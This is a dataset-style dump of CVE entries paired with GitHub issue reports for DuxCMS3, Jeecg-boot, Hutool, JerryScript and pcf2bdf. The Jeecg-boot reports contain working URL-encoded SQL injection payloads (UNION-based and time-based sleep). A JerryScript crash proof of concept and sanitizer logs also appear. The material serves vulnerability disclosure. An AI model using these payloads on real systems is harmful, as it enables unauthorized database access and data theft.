[ "duxphp", "DuxCMS3" ]
sql injection vulnerability exists in tools SendTpl module, url is /s/tools/SendTpl/index?keyword=xxx, please check SystemExtendAdmin.php 39-50 more details in https://www.star123.top/2021/01/16/duxcms3-1-3%E5%AE%A1%E8%AE%A1/#more
backend sql injection vulnerability
https://api.github.com/repos/duxphp/DuxCMS3/issues/4/comments
0
2021-01-17T02:07:36Z
2021-01-17T02:07:36Z
https://github.com/duxphp/DuxCMS3/issues/4
787,596,259
4
3,210
CVE-2022-22880
2022-02-16T22:15:07.677
Jeecg-boot v3.0 was discovered to contain a SQL injection vulnerability via the code parameter in /jeecg-boot/sys/user/queryUserByDepId.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/jeecgboot/jeecg-boot/issues/3347" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/jeecgboot/jeecg-boot/issues/3347" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jeecg:jeecg_boot:*:*:*:*:*:*:*:*", "matchCriteriaId": "C6D5281A-1578-443B-921C-0CE7B9B36BA4", "versionEndExcluding": null, "versionEndIncluding": "3.0", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/jeecgboot/jeecg-boot/issues/3347
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "jeecgboot", "jeecg-boot" ]
##### 版本号: <=3.0 ##### 问题描述: After testing, it is found that the code parameter of /jeecg-boot/sys/user/queryUserByDepId interface of jeecg-boot has SQL injection ##### 截图&代码: payload:/jeecg-boot/sys/user/queryUserByDepId?_t=1641263644&id=57197590443c44f083d42ae24ef26a2c&realname=%64%61%73%64%27%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%63%6f%6e%63%61%74%28%30%78%37%2c%69%66%6e%75%6c%6c%28%63%61%73%74%28%63%75%72%72%65%6e%74%5f%75%73%65%72%28%29%20%61%73%20%6e%63%68%61%72%29%2c%30%78%32%30%29%2c%30%78%37%29%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2d%2d%20%2d ![1](https://user-images.githubusercontent.com/30540295/148018153-c08bda45-f7b0-4ccd-8418-f49448d803ac.png) The vulnerability code exists in the following code:\jeecg-boot\jeecg-boot-module-system\src\main\java\org\jeecg\modules\system\controller\SysUserController.java At line 366 of ![2](https://user-images.githubusercontent.com/30540295/148018195-148932eb-445b-4d71-968a-d49cbd34c0d2.png) ![3](https://user-images.githubusercontent.com/30540295/148018255-92a04e68-b9c7-44d8-8421-8ba7df804c1f.png) ![4](https://user-images.githubusercontent.com/30540295/148018264-95d0b957-81c3-43f5-bd08-b88df2a30c66.png) #### 友情提示(为了提高issue处理效率): - 未按格式要求发帖,会被直接删掉; - 请自己初判问题描述是否清楚,是否方便我们调查处理; - 针对问题请说明是Online在线功能(需说明用的主题模板),还是生成的代码功能; - 描述过于简单或模糊,导致无法处理的,会被直接删掉;
SQL injection exists in /jeecg-boot/sys/user/queryUserByDepId
https://api.github.com/repos/jeecgboot/JeecgBoot/issues/3347/comments
2
2022-01-04T06:28:26Z
2022-01-18T02:56:58Z
https://github.com/jeecgboot/JeecgBoot/issues/3347
1,093,051,129
3,347
3,211
CVE-2022-22881
2022-02-16T22:15:07.723
Jeecg-boot v3.0 was discovered to contain a SQL injection vulnerability via the code parameter in /sys/user/queryUserComponentData.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/jeecgboot/jeecg-boot/issues/3348" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/jeecgboot/jeecg-boot/issues/3348" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jeecg:jeecg_boot:*:*:*:*:*:*:*:*", "matchCriteriaId": "C6D5281A-1578-443B-921C-0CE7B9B36BA4", "versionEndExcluding": null, "versionEndIncluding": "3.0", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/jeecgboot/jeecg-boot/issues/3348
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "jeecgboot", "jeecg-boot" ]
##### 版本号: jeecg-boot<=3.0 ##### 问题描述: After testing, it is found that the code parameter of /sys/user/queryUserComponentData interface of jeecg-boot has SQL injection Reuse https://github.com/jeecgboot/jeecg-boot After the source code of the project starts the project, click "custom component" and grab the package to get the interface with SQL injection, and use sqlmap to prove the existence of SQL injection ##### 截图&代码: payload: /jeecg-boot/sys/user/queryUserComponentData?_t=1641263644&pageNo=1&pageSize=10&departId=5159cde220114246b045e574adceafe9&realname=admin&username=%61%64%6d%69%6e%27%20%61%6e%64%20%28%73%65%6c%65%63%74%20%39%33%36%31%20%66%72%6f%6d%20%28%73%65%6c%65%63%74%28%73%6c%65%65%70%28%35%29%29%29%6f%46%78%55%29%2d%2d%20 ![1](https://user-images.githubusercontent.com/30540295/148031223-f02bd99a-869f-4f17-bee3-9b04574ba894.png) or /jeecg-boot/sys/user/queryUserComponentData?_t=1641263644&pageNo=1&pageSize=10&departId=5159cde220114246b045e574adceafe9&realname=%61%64%6d%69%6e%27%20%55%4e%49%4f%4e%20%41%4c%4c%20%53%45%4c%45%43%54%20%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%43%4f%4e%43%41%54%28%30%78%37%31%36%61%37%30%36%32%37%31%2c%30%78%37%37%34%63%37%30%34%39%34%61%34%39%35%37%34%64%35%36%35%39%36%63%36%39%35%30%34%66%34%65%35%34%36%32%36%33%35%39%34%35%36%63%36%36%35%61%35%36%35%37%34%38%35%34%35%34%37%61%36%31%37%37%35%37%37%30%34%33%36%39%34%31%36%64%34%61%34%31%36%37%2c%30%78%37%31%36%62%37%31%37%31%37%31%29%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2d%2d%20%2d0&username=zz12 ![2](https://user-images.githubusercontent.com/30540295/148031259-3c3c6ecd-9164-40e3-8fee-fc19d55815b3.png) Using sqlmap ![3](https://user-images.githubusercontent.com/30540295/148031288-015466cf-e248-4f70-a1cb-ae5b6b0a1a18.png) The vulnerability code exists in the following code:\jeecg-boot\jeecg-boot-module-system\src\main\java\org\jeecg\modules\system\controller\SysUserController.java At line 402 of ![4](https://user-images.githubusercontent.com/30540295/148031292-8732ab0b-f8dd-4c9e-9b18-18b7c4a908ff.png) ![5](https://user-images.githubusercontent.com/30540295/148031297-995a7e16-1296-4bbb-a62c-1393b712d84f.png) ![6](https://user-images.githubusercontent.com/30540295/148031303-01b8d4a1-fa94-45b9-803b-5dc595396793.png) #### 友情提示(为了提高issue处理效率): - 未按格式要求发帖,会被直接删掉; - 请自己初判问题描述是否清楚,是否方便我们调查处理; - 针对问题请说明是Online在线功能(需说明用的主题模板),还是生成的代码功能; - 描述过于简单或模糊,导致无法处理的,会被直接删掉;
SQL injection exists in /sys/user/queryUserComponentData
https://api.github.com/repos/jeecgboot/JeecgBoot/issues/3348/comments
3
2022-01-04T08:36:23Z
2022-02-21T13:29:22Z
https://github.com/jeecgboot/JeecgBoot/issues/3348
1,093,125,235
3,348
3,212
CVE-2022-22885
2022-02-16T22:15:07.773
Hutool v5.7.18's HttpRequest was discovered to ignore all TLS/SSL certificate validation.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://apidoc.gitee.com/dromara/hutool/cn/hutool/http/ssl/DefaultSSLInfo.html" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/dromara/hutool/issues/2042" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://apidoc.gitee.com/dromara/hutool/cn/hutool/http/ssl/DefaultSSLInfo.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/dromara/hutool/issues/2042" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:hutool:hutool:5.7.18:*:*:*:*:*:*:*", "matchCriteriaId": "4C9E9670-0982-49B3-A11D-D4F294D3B8CD", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "295" ]
295
https://github.com/dromara/hutool/issues/2042
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "dromara", "hutool" ]
### 版本情况 JDK版本: corretto_8_312 hutool版本: 5.7.18(请确保最新尝试是否还有问题) ### 问题描述(包括截图) 注意到 hutool HttpUtil 中 HttpConnection#setHttpsInfo 默认传入的 HostnameVerifier 是 DefaultSSLInfo.TRUST_ANY_HOSTNAME_VERIFIER,即: ```java package cn.hutool.http.ssl; import javax.net.ssl.HostnameVerifier; import javax.net.ssl.SSLSession; public class TrustAnyHostnameVerifier implements HostnameVerifier { public TrustAnyHostnameVerifier() { } public boolean verify(String hostname, SSLSession session) { return true; } } ``` 查看 javax.net.ssl.HttpsURLConnection.DefaultHostnameVerifier 代码如下: ```java /** * <code>HostnameVerifier</code> provides a callback mechanism so that * implementers of this interface can supply a policy for * handling the case where the host to connect to and * the server name from the certificate mismatch. * <p> * The default implementation will deny such connections. */ private static HostnameVerifier defaultHostnameVerifier = new DefaultHostnameVerifier(); /* * The initial default <code>HostnameVerifier</code>. Should be * updated for another other type of <code>HostnameVerifier</code> * that are created. */ private static class DefaultHostnameVerifier implements HostnameVerifier { @Override public boolean verify(String hostname, SSLSession session) { return false; } } /** * The <code>hostnameVerifier</code> for this object. */ protected HostnameVerifier hostnameVerifier = defaultHostnameVerifier; ``` 从 doc 看到 HostnameVerifier 是一种 fallback 机制,当要连接的 host 与服务端证书 server name 不匹配时才有作用。并且 javax.net.ssl.HttpsURLConnection 的默认机制是这时候拒绝此类请求。而 hutool 则默认放行所有这类请求。 如果调用 cn.hutool.http.HttpRequest 时手动传入上面的 javax.net.ssl.HttpsURLConnection.DefaultHostnameVerifier: ```java String result1 = HttpRequest.get("https://www.baidu.com") .setHostnameVerifier(HttpsURLConnection.getDefaultHostnameVerifier()) .execute().body(); System.out.println(result1); ``` 也会请求成功。按我理解这样才是合理的,如果服务端证书 server name 与 host 不匹配,应该中断请求才安全。请问我的理解是否正确?是不是其实 javax.net.ssl.HttpsURLConnection 的默认行为会有坑,hutool 才另外指定了 HostnameVerifier 呢? 谢谢。
默认的 HostnameVerifier 为什么选择 TrustAnyHostnameVerifier 呢?
https://api.github.com/repos/chinabugotech/hutool/issues/2042/comments
2
2021-12-26T12:41:33Z
2024-03-12T02:30:59Z
https://github.com/chinabugotech/hutool/issues/2042
1,088,763,905
2,042
3,213
CVE-2022-22901
2022-02-17T03:15:06.847
There is an Assertion in 'context_p->next_scanner_info_p->type == SCANNER_TYPE_FUNCTION' failed at parser_parse_function_arguments in /js/js-parser.c of JerryScript commit a6ab5e9.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Not Applicable", "URL Repurposed" ], "url": "http://jerryscript.com" }, { "source": "cve@mitre.org", "tags": [ "Product", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/4916" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Not Applicable", "URL Repurposed" ], "url": "http://jerryscript.com" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/4916" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jerryscript:jerryscript:-:*:*:*:*:*:*:*", "matchCriteriaId": "4EB495C8-348F-4B04-B31F-1F4EE471CC22", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "617" ]
617
https://github.com/jerryscript-project/jerryscript/issues/4916
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "jerryscript-project", "jerryscript" ]
##### JerryScript commit hash `a6ab5e9` ##### Build platform Ubuntu 20.04 LTS ##### Build steps ./tools/build.py --clean --compile-flag=-fsanitize=address --lto=off --error-message=on --profile=es2015-subset --stack-limit=15 --debug --logging=on --line-info=on ##### poc ```js function test(proxyTarget) { var { proxy, revoke } = Proxy.revocable(proxyTarget< new Proxy({}, { get{(target, propertyKey, receiver) { revoke(); } })); return proxy; } Object.getPrototypeOf(test({})); ``` ##### assert log ``` ICE: Assertion 'context_p->next_scanner_info_p->type == SCANNER_TYPE_FUNCTION' failed at /home/ubuntu/fuzz/jerryscript/jerry-core/parser/js/js-parser.c(parser_parse_function_arguments):1618. Error: ERR_FAILED_INTERNAL_ASSERTION Aborted ``` ##### asan log ``` AddressSanitizer:DEADLYSIGNAL ================================================================= ==602568==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x55cb2935a0c1 bp 0x7ffdb322746c sp 0x7ffdb32250a0 T0) ==602568==The signal is caused by a READ memory access. ==602568==Hint: address points to the zero page. #0 0x55cb2935a0c0 (/home/ubuntu/fuzz/jerryscript/build/bin/jerry+0x2d40c0) #1 0x55cb2932cbce (/home/ubuntu/fuzz/jerryscript/build/bin/jerry+0x2a6bce) #2 0x55cb2933ed63 (/home/ubuntu/fuzz/jerryscript/build/bin/jerry+0x2b8d63) #3 0x55cb2945e610 (/home/ubuntu/fuzz/jerryscript/build/bin/jerry+0x3d8610) #4 0x55cb294763dc (/home/ubuntu/fuzz/jerryscript/build/bin/jerry+0x3f03dc) #5 0x55cb2947ea5f (/home/ubuntu/fuzz/jerryscript/build/bin/jerry+0x3f8a5f) #6 0x55cb2947c741 (/home/ubuntu/fuzz/jerryscript/build/bin/jerry+0x3f6741) #7 0x55cb2947ea8b (/home/ubuntu/fuzz/jerryscript/build/bin/jerry+0x3f8a8b) #8 0x55cb2947c741 (/home/ubuntu/fuzz/jerryscript/build/bin/jerry+0x3f6741) #9 0x55cb2947ea8b (/home/ubuntu/fuzz/jerryscript/build/bin/jerry+0x3f8a8b) #10 0x55cb2948623b (/home/ubuntu/fuzz/jerryscript/build/bin/jerry+0x40023b) #11 0x55cb29487623 (/home/ubuntu/fuzz/jerryscript/build/bin/jerry+0x401623) #12 0x55cb294951f3 (/home/ubuntu/fuzz/jerryscript/build/bin/jerry+0x40f1f3) #13 0x55cb2949a49b (/home/ubuntu/fuzz/jerryscript/build/bin/jerry+0x41449b) #14 0x55cb2933ef1a (/home/ubuntu/fuzz/jerryscript/build/bin/jerry+0x2b8f1a) #15 0x55cb294925c5 (/home/ubuntu/fuzz/jerryscript/build/bin/jerry+0x40c5c5) #16 0x55cb2949c035 (/home/ubuntu/fuzz/jerryscript/build/bin/jerry+0x416035) #17 0x55cb2933b318 (/home/ubuntu/fuzz/jerryscript/build/bin/jerry+0x2b5318) #18 0x55cb29200f3d (/home/ubuntu/fuzz/jerryscript/build/bin/jerry+0x17af3d) #19 0x55cb290b7290 (/home/ubuntu/fuzz/jerryscript/build/bin/jerry+0x31290) #20 0x7f2801d550b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2) #21 0x55cb290c4c0d (/home/ubuntu/fuzz/jerryscript/build/bin/jerry+0x3ec0d) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV (/home/ubuntu/fuzz/jerryscript/build/bin/jerry+0x2d40c0) ==602568==ABORTING ```
Assertion 'context_p->next_scanner_info_p->type == SCANNER_TYPE_FUNCTION' failed at /home/ubuntu/fuzz/jerryscript/jerry-core/parser/js/js-parser.c(parser_parse_function_arguments):1618
https://api.github.com/repos/jerryscript-project/jerryscript/issues/4916/comments
0
2022-01-02T19:10:38Z
2022-05-21T14:30:43Z
https://github.com/jerryscript-project/jerryscript/issues/4916
1,092,081,853
4,916
3,214
CVE-2022-23318
2022-02-17T13:15:07.813
A heap-buffer-overflow in pcf2bdf, versions >= 1.05 allows an attacker to trigger unsafe memory access via a specially crafted PCF font file. This out-of-bound read may lead to an application crash, information disclosure via program memory or other context-dependent impact.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.2, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ganaware/pcf2bdf" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/ganaware/pcf2bdf/issues/4" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ganaware/pcf2bdf" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/ganaware/pcf2bdf/issues/4" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:pcf2bdf_project:pcf2bdf:1.04:*:*:*:*:*:*:*", "matchCriteriaId": "3C056252-FB4B-49C8-875B-597EDC1257F1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:pcf2bdf_project:pcf2bdf:1.05:*:*:*:*:*:*:*", "matchCriteriaId": "181D9F88-3AF3-40B9-8E91-A54B07C6C7CF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/ganaware/pcf2bdf/issues/4
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "ganaware", "pcf2bdf" ]
Hello @ganaware, as discussed earlier: I have compiled pcf2bdf with address sanitization and fuzz-tested inputs with `AFL`. The file attached causes a memory access violation. The actual input file is stored within the zipped folder attached. Input: `./pcf2bdf heap_overflow_read_40b` Output: ``` gzip: heap_overflow_read_40b: unexpected end of file ================================================================= ==5565==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000000050 at pc 0x0000004095b0 bp 0x7fffff5362b0 sp 0x7fffff5362a0 READ of size 40 at 0x602000000050 thread T0 #0 0x4095af in main /home/ec2-user/pcf2bdf_research/pcf2bdf.cc:852 #1 0x7f7a5a1c6139 in __libc_start_main (/lib64/libc.so.6+0x21139) #2 0x409b49 in _start (/home/ec2-user/pcf2bdf_research/with_asan/pcf2bdf+0x409b49) 0x602000000051 is located 0 bytes to the right of 1-byte region [0x602000000050,0x602000000051) allocated by thread T0 here: #0 0x7f7a5af01f41 in operator new[](unsigned long) (/lib64/libasan.so.4+0xd9f41) #1 0x4074a4 in main /home/ec2-user/pcf2bdf_research/pcf2bdf.cc:829 SUMMARY: AddressSanitizer: heap-buffer-overflow /home/ec2-user/pcf2bdf_research/pcf2bdf.cc:852 in main Shadow bytes around the buggy address: 0x0c047fff7fb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c047fff8000: fa fa 01 fa fa fa 01 fa fa fa[01]fa fa fa fa fa 0x0c047fff8010: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==5565==ABORTING ``` [heap_overflow_read_40b.zip](https://github.com/ganaware/pcf2bdf/files/7846643/heap_overflow_read_40b.zip)
Heap-buffer-overflow in pcf2bdf
https://api.github.com/repos/ganaware/pcf2bdf/issues/4/comments
2
2022-01-11T12:41:03Z
2022-02-21T20:15:41Z
https://github.com/ganaware/pcf2bdf/issues/4
1,099,105,748
4
3,215
CVE-2022-23319
2022-02-17T14:15:08.073
A segmentation fault during PCF file parsing in pcf2bdf versions >=1.05 allows an attacker to trigger a program crash via a specially crafted PCF font file. This crash affects the availability of the software and dependent downstream components.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
